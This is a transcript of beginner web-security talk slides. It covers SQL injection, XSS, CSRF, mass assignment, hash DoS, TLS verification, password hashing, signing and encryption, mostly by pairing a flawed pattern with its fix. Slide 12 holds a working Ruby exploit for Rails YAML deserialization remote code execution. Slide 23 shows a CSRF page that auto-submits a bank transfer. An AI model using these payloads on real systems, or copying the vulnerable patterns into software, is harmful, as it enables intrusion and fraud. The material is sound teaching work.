Security for dummies

Transcript

1. Dirkjan Bussink d.bussink@gmail.com twitter.com/dbussink github.com/dbussink

2. Security 101 The very very basics

3. Not part of today

4. Social Engineering Because there is no patch for human stupidity

5. statement = "SELECT * FROM users WHERE name = '"

   + username + "'" SQL Injection
6. None

7. statement = ["SELECT * FROM users WHERE name = ?",

   username] SQL Injection Parameter binding

8. Cross site scripting <div><%= person.name %></div> Inject Javascript!

9. Mass assignment <html> <body> <form method="post" action="new_person"> <input type="text" name="name"

   value="" id="" /> <input type="hidden" name="parent_id" value="123" id="" /> <input type="submit" value="" id="" /> </form> </body> </html> What if I add this?

10. Frameworks Solve it easily for you

11. Remote code execution Let the server run my ruby rce.rb

    "Process.exit!"

12. require 'net/http' require 'net/https' require 'uri' require 'yaml' code =

    ARVG[0] url = "http://localhost:3000" escaped_code = "foo; #{code}\n__END__\n" yaml = %{ --- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection ? #{escaped_code.to_yaml.sub('--- ','').chomp} : !ruby/object:OpenStruct table: :defaults: :action: create :controller: foos :required_parts: [] :requirements: :action: create :controller: foos :segment_keys: - :format modifiable: true }.strip xml = %{ <?xml version="1.0" encoding="UTF-8"?> <exploit type="yaml">#{yaml}</exploit> }.strip uri = URI.parse(url) http = Net::HTTP.new(uri.host, uri.port) request = Net::HTTP::Post.new(uri.request_uri, "X-HTTP-Method-Override" => "GET") request.content_type = "text/xml" request.set_body_internal(xml) response = http.request(request)

13. Direct object references http://myapp.com/people/1 Let’s change this to 2!

14. Access control Scope your queries

15. External input Trust nobody

16. None

17. Set-Cookie: session_id=lee2oochaekae4woh6A; path=/; document.cookie => "session_id=lee2oochaekae4woh6A;" Steal cookie in combination

    with a XSS attack

18. Set-Cookie: session_id=lee2oochaekae4woh6A; path=/; HttpOnly document.cookie => "" HttpOnly Disallows reading

    by Javascript

19. Set-Cookie: session_id=lee2oochaekae4woh6A; path=/; HttpOnly; secure Secure Only send cookie over

    HTTPS

20. Frameworks Use one that solves this

21. CSRF Who submits your forms?

22. None

23. On my evil hack site Just loading my page transfers

    money <iframe name=hack></iframe> <script> document.write('<form target=hack name=go method=post action="http://mybank.com/transfer.php"> </form>') go.submit() </script>

24. <html> <body> <form method="post" action="transfer.php"> <input type="text" name="csrf_token" value="om5bohY2" id=""

    /> <input type="text" name="amount" value="" id="" /> <input type="text" name="from_account" value="" id="" /> <input type="text" name="to_account" value="" id="" /> <input type="submit" value="" id="" /> </form> </body> </html> Add token to each form Token ensures other site can’t simply POST to your

25. Hash DOS Crafting input to do DOS attack

26. Bucket 0 1 2 3 4 5 Figure 1: Normal

    operation of a hash table. suggested the use of crypto puzzles [9] to force clients to perform more work before the server does its work. Provably requiring the client to con- sume CPU time may make sense for fundamen- tally expensive operations like RSA decryption, but it seems out of place when the expensive opera- tion (e.g., HTML table layout) is only expensive because a poor algorithm was used in the system. Another recent paper [16] is a toolkit that allows programmers to inject sensors and actuators into a program. When a resource abuse is detected an ap- propriate action is taken. Bucket 0 1 2 3 4 5 Figure 2: Worst-case hash table collisions. bles are so common that programming languages like Perl provide syntactic sugar to represent hash tables as “associative arrays,” making them easy for programmers to use. Programmers clearly prefer hash tables for their constant-time expected behav- ior, despite their worst-case O(n) per-operation run- ning time. After all, what are the odds that a hash table will degenerate to its worst case behavior? In typical usage, objects to be inserted into a hashtable are first reduced to a 32-bit hash value. Strings might be hashed using a checksum oper- Craft input for collision

27. Hashes everywhere A lot of attack vectors

28. SSL in your app Verify certificates

29. curl_easy_setopt(download_handle, CURLOPT_SSL_VERIFYHOST, 2); 2 is the magic value...

30. $fp = fsockopen ('ssl://www.paypal.com', 443, $errno, $errstr, 30); fsockopen() does

    not validate server certificate PHP

31. The “advanced” SSLSocketFactory API silently skips hostname verification if the

    algorithm field in the SSL client is NULL or an empty string rather than HTTPS Java Why this as the default?

32. require "net/http" require "net/https" require "uri" uri = URI.parse("https://secure.site/") http

    = Net::HTTP.new uri.host, uri.port http.use_ssl = true http.verify_mode = OpenSSL::SSL::VERIFY_PEER request = Net::HTTP::Get.new(uri.request_uri) response = http.request(request) Ruby Does not validate certificate by default...

33. Stupid API’s Know how to work with them

34. Storing passwords Can I get the passwords stored in your

    database?
35. None

36. But I’m safe, I hash and salt! Digest::SHA1.hexdigest( "#{password}--#{salt}" )

37. 1.93% were between 6 and 10 characters long 2.45% were

    comprised entirely of lowercase characters 3.36% were found in a common password dictionary 4.67% were reused by the same person on a totally unrelated service (Gawker) 5.Only 1% of them contained a non-alphanumeric character 77 million breached PlayStation Network accounts

38. 260M checks / second GPU acceleration makes forcing viable these

    days

39. Salted hashes are not good enough anymore

40. Libraries Use them, don’t roll your ow

41. bcrypt PBKDF2 scrypt

42. Designed to be slow

43. KDF 6 letters 8 letters 8 chars 10 chars 40-char

    text DES CRYPT < $1 < $1 < $1 < $1 < $1 MD5 < $1 < $1 < $1 $1.1k $1 MD5 CRYPT < $1 < $1 $130 $1.1M $1.4k PBKDF2 (100 ms) < $1 < $1 $18k $160M $200k bcrypt (95 ms) < $1 $4 $130k $1.2B $1.5M scrypt (64 ms) < $1 $150 $4.8M $43B $52M PBKDF2 (5.0 s) < $1 $29 $920k $8.3B $10M bcrypt (3.0 s) < $1 $130 $4.3M $39B $47M scrypt (3.8 s) $900 $610k $19B $175T $210B

44. I have something else now! Migration is not very hard

45. Add new authentication When user logs in, store password in

    new way After X time remove old passwords

46. Signing Don’t design your own

47. user_id=1--kee0oiviemaeXiW7aeb8eexuthohyua Signed cookies Hash computed with secret

48. http://myapp.com/profile/1/wa5eexuf9wiex1do Email URL with direct login Hash for one time

    login

49. Digest::SHA1.hexdigest( "user_id=#{id}-#{secret_token}" ) Hash with a secret Broken

50. sha256 = OpenSSL::Digest::Digest.new('sha256') tag = OpenSSL::HMAC.hexdigest(sha256, secret_token, message) HMAC hash-based

    message authentication code

51. Encryption Know what you are doing

52. AES ECB Just don’t use it

53. None

54. AES CBC / CTR When using CBC mode, an Initialization

    Vector (IV) is provided along with the key when starting an encrypt or decrypt operation. If CBC mode is selected and no IV is provided, an IV of all zeroes will be used.

55. Don’t trust input Also sign encrypted data

56. cookie = "j2x+8Y5CqDRnYqRvMsHmi61YBzA7qvc4f7agmYxdHgvqz 7Jaekoxjp3MrgSvB3GU--kc/FbSvFIfIFzM0UzQhhvw==" Encrypted cookie aes-128-cbc

57. "so long, and thanks for all the fish"

58. Encrypt then MAC Verify that the data is authentic

59. Authenticated encryption

60. None

61. https://www.owasp.org/index.php/Top_10_2010-Main https://www.owasp.org/index.php/SQL_Injection https://www.owasp.org/index.php/Top_10_2010-A4 https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) http://www.cs.rice.edu/~scrosby/hash/CrosbyWallach_UsenixSec2003.pdf http://www.cs.utexas.edu/~shmat/shmat_ccs12.pdf http://www.troyhunt.com/2011/06/brief-sony-password-analysis.html http://gpuscience.com/cs/cracking-salted-sha1-password-hashes-on-gpu/ http://www.bsdcan.org/2009/schedule/attachments/86_scrypt_slides.pdf

    http://en.wikipedia.org/wiki/Hash-based_message_authentication_code http://blog.jcoglan.com/2012/06/09/why-you-should-never-use-hash-functions-for-message-authentication/ http://en.wikipedia.org/wiki/Block_cipher_modes_of_operation#Electronic_codebook_.28ECB.29 http://en.wikipedia.org/wiki/Padding_oracle_attack http://tonyarcieri.com/all-the-crypto-code-youve-ever-written-is-probably-broken https://www.coursera.org/course/crypto Background